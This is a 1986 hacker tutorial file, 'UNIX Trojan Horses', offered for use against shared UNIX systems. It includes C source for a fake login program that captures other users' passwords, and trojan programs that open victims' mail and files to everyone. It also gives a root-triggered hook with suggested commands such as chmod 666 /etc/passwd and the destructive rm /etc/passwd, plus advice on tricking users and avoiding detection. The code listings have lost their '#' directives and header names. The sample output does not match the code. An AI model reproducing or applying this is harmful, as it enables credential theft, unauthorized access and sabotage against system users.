------------------

UNIX Trojan Horses

------------------



By Shooting Shark of Tiburon Systems / R0DENTZWARE - 6/26/86



Introduction

------------



     "UNIX Security" is an oxymoron.  It's an easy system to brute-

force hack (most UNIX systems don't hang up after x number of login

tries, and there are a number of default logins, such as root, bin,

sys and uucp).  Once you're in the system, you can easily bring

it to its knees (see my previous Phrack article, "UNIX Nasty Tricks")

or, if you know a little 'C', you can make the system work for you

and totally eliminate the security barriers to creating your own

logins, reading anybody's files, etcetera.  This file will outline

such ways by presenting 'C' code that you can implement yourself.



Requirements

------------

     You'll need a working account on a UNIX system.  It should be

a fairly robust version of UNIX (such as 4.2bsd or AT&T System V)

running on a real machine (a PDP/11, VAX, Pyramid, etc.) for the

best results.  If you go to school and have an account on the school

system, that will do perfectly.



Notes

-----

     This file was inspired an article in the April, '86 issue of

BYTE entitled "Making UNIX Secure."  In the article, the authors say

"We provide this information in a way that, we hope, is interesting and

useful yet stops short of being a 'cookbook for crackers.'  We have

often intentionally omitted details."  I am following the general

outline of the article, giving explicit examples of the methods they touched

on.



     An unrelated note:  Somewhere there's a dude running around using

the handle "Lord British" (not THE Lord British...).  This is a message

for LB:  "Fuck off and die."



Here we go...



Project One:  Fishing For Passwords

-----------------------------------



     You can implement this with only a minimal knowledge of UNIX and

C.  However, you need access to a terminal that many people use -

the computer lab at your school, for example.



     When you log onto a typical UNIX system, you see something like this:



Tiburon Systems 4.2bsd / System V (shark)





login: shark

Password:      (not printed)



     The program I'm giving you here simulates a logon sequence.  You

run the program from a terminal and then leave.  Some unknowing fool

will walk up and enter their login and password.  It is written to a

file of yours, then "login incorrect" is printed, then the fool is

asked to log in again.  The second time it's the real login program.

This time the person succeeds and they are none the wiser.



     On the system, put the following code into a file called 'horse.c'.

You will need to modify the first 8 lines to fit your system's appearance.





----- Code Begins Here -----



/* this is what a 'C' comment looks like.  You can leave them out. */



/* define's are like macros you can use for configuration. */



define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"



/* The above string should be made to look like the message that your

 * system prints when ready.  Each \n represents a carriage return.

 */



define LOGIN  "login: "



/* The above is the login prompt.  You shouldn't have to change it

 * unless you're running some strange version of UNIX.

 */



define PASSWORD "password:"



/* The above is the password prompt.  You shouldn't have to change

 * it, either.

 */



define WAIT 2



/* The numerical value assigned to WAIT is the delay you get after

 * "password:" and before "login incorrect."  Change it (0 = almost

 * no delay, 5 = LONG delay) so it looks like your system's delay.

 * realism is the key here - we don't want our target to become

 * suspicious.

 */





define INCORRECT "Login incorrect.\n"



/* Change the above so it is what your system says when an incorrect

 * login is given.  You shouldn't have to change it.

 */



define FILENAME "stuff"



/* FILENAME is the name of the file that the hacked passwords will

 * be put into automatically.  'stuff' is a perfectly good name.

 */



/* Don't change the rest of the program unless there is a need to

 * and you know 'C'.

 */



include 

include 

int stop();



main()

{

char name[10], password[10];

int i;

FILE *fp, *fopen();

signal(SIGINT,stop);

initscr();

printf(SYSTEM);

printf(LOGIN);

scanf("%[^\n]",name);

getchar();

noecho();

printf(PASSWORD);

scanf("%[^\n]",password);

printf("\n");

getchar();

echo();

sleep(WAIT);





if ( ( fp = fopen(FILENAME,"a") )  != NULL ) {

fprintf(fp,"login %s has password %s\n",name,password);

fclose(fp);

}



printf(INCORRECT);

endwin();

}



stop()

{

endwin();

exit(0);

}





----- Source Ends Here -----



     OK, as I said, enter the above and configure it so it looks exactly

like your system's login sequence.  To compile this program called

'horse.c' type the following two lines: (don't type the %'s, they are

just a sample prompt)



% cc horse.c -lcurses -ltermcap

% mv a.out horse



You now have the working object code in a file called 'horse'.  Run it,

and if it doesn't look like your systems logon sequence, re-edit horse.c

and re-compile it.  When you're ready to put the program into use, create

a new file and call it 'trap' or something.  'trap' should have these two

commands:



horse                    (this runs your program)

login                    (this runs the real login program)



to execute 'trap' type:



% source trap            (again, don't type the %)



and walk away from your terminal...



After you've run it successfully a few times, check your file called

'stuff' (or whatever you decided to call it).  It will look like this:



user john has password secret

user mary has password smegma

etc.



Copy down these passwords, then delete this file (it can be VERY

incriminating if the superuser sees it).



Note - for best results your terminal should be set to time-out after

a few minutes of non-use - that way, your horse program doesn't

run idle for 14 hours if nobody uses the terminal you ran it on.



-----



The next projects can be run on a remote system, such as the VAX in

Michigan you've hacked into, or Dartmouth's UNIX system, or whatever.

However, they require a little knowledge of the 'C' language.  They're

not something for UNIX novices.



Project Two:  Reading Anybody's Files

-------------------------------------



When somebody runs a program, they're the owner of the process created

and that program can do anything they would do, such as delete a file

in their directory or making a file of theirs available for reading

by anybody.



When people save old mail they get on a UNIX system, it's put into

a file called mbox in their home directory.  This file can be fun

to read but is usually impossible for anybody but the file's owner

to read.  Here is a short program that will unlock (i.e. chmod 777,

or let anybody on the system read, write or execute) the mbox file

of the person who runs the program:



----- Code Begins Here -----



include 



struct passwd *getpwnam(name);

struct passwd *p;

char buf[255];



main()

{

p = getpwnam(getlogin());

sprintf(buf,"%s/%s",p->pw_dir,"mbox");

if ( access(buf,0) > -1 ) {

        sprintf(buf,"chmod 777 %s/%s",p->pw_dir,"mbox");

        system(buf);

        }

}



----- Code Ends Here -----



So the question is:  How do I get my target to run this program that's

in my directory?



If the system you're on has a public-messages type of thing (on

4.xbsd, type 'msgs') you can advertise your program there.  Put the

above code in another program - find a utility or game program in

some magazine like UNIX WORLD and modify it and do the above before

it does it's real thing.  So if you have a program called tic-tac-toe

and you've modified it to unlock the mbox file of the user before it

plays tic-tac-toe with him, advertise "I have a new tic-tac-toe program

running that you should all try.  It's in my directory." or whatever.

If you don't have means of telling everybody on the system via a public

message, then just send mail to the specific people you want to trap.



If you can't find a real program to modify, just take the above program

and add this line between the two '}' lines at the end of the program:



printf("Error opening tic-tac-toe data file.  Sorry!\n");



when the program runs, it will print the above error message.  The user

will think "Heh, that dude doesn't know how to write a simple tic-tac-

toe program!" but the joke's on him - you can now read his mail.



If there's a specific file in a user's directory that you'd like to

read (say it's called "secret") just throw together this general

program:





main()

{

if ( access("secret",0) > -1 ) system("chmod 777 secret");

}



then 'talk' or 'write' to him and act like Joe Loser: "I wrote this program

called super_star_wars, will you try it out?"



You can use your imagination.  Think of a command you'd like somebody

to execute.  Then put it inside a system() call in a C program and

trick them into running your program!



Here's a very neat way of using the above technique:



Project Three: Become the superuser

-----------------------------------



Write a program that you can get people to run.  Put this line in

it somewhere:



if ( !strcmp(getlogin(),"root") ) system("whatever you want");



This checks to see if the root login is running your program.  If

he is, you can have him execute any shell command you'd like.

Here are some suggestions:



"chmod 666 /etc/passwd"



     /etc/passwd is the system's password file.  The root owns this

file.  Normally, everyone can read it (the passwords are encrypted)

but only the root can write to it.  Take a look at it and see how it's

formatted if you don't know already.  This command makes it possible

for you to now write to the file - i.e. create unlimited accounts for

yourself and your friends.



"chmod 666 /etc/group"



     By adding yourself to some high-access groups, you can open many

doors.



"chmod 666 /usr/lib/uucp/L.sys"



     Look for this file on your system if it is on the uucp net.  It

contains dialups and passwords to other systems on the net, and normally

only the uucp administrator can read it.  Find out who owns this file

and get him to unknowingly execute a program to unlock it for you.



"rm /etc/passwd"



     If you can get the root to execute this command, the system's

passwd file will be removed and the system will go down and will

not come up for some time to come.  This is very destructive.



-----



If you are going to go about adding a trojan horse program to the

system, there are some rules you should follow.  If the hidden purpose

is something major (such as unlocking the user's mbox or deleting all

of his files or something) this program shouldn't be a program that

people will be running a lot (such as a popular computer game) - once

people discover that their files are public access the source of the

problem will be discovered quite easily.  Save this purpose for a 'test'

program (such as a game you're in the process of writing) that you

ask individual people to run via mail or 'chatting' with them.  As I

said, this 'test' program can bomb or print a phony error message after

completing its task, and you will just tell the person "well, I guess

it needs more work", wait until they log off, and then read whatever

file of theirs that you've unlocked.  If your trojan horse program's

sole purpose is to catch a specific user running it - such as the

root or other high-powered user - you can put the code to do so

in a program that will be run a lot by various users of the system.

Your modification will remain dormant until he runs it.

If you can't find the source to 'star trek' or whatever in C, just

learn C and convert something from pascal.  It can't hurt to learn

C as it's a great language.  We've just seen what it can do on a

UNIX system.  Once you've caught the root (i.e. you can now modify

the /etc/passwd file) remove the spurious code from your trojan horse

program and you'll never be caught.



That's it...if you have any questions or comments or you just want

to bitch at me, call this system:



The Matrix

415/922-2008

101 megs, IBM warezzz, 2400 baud, Phrack sub-board, etc.



Lord British, I *dare* you to call.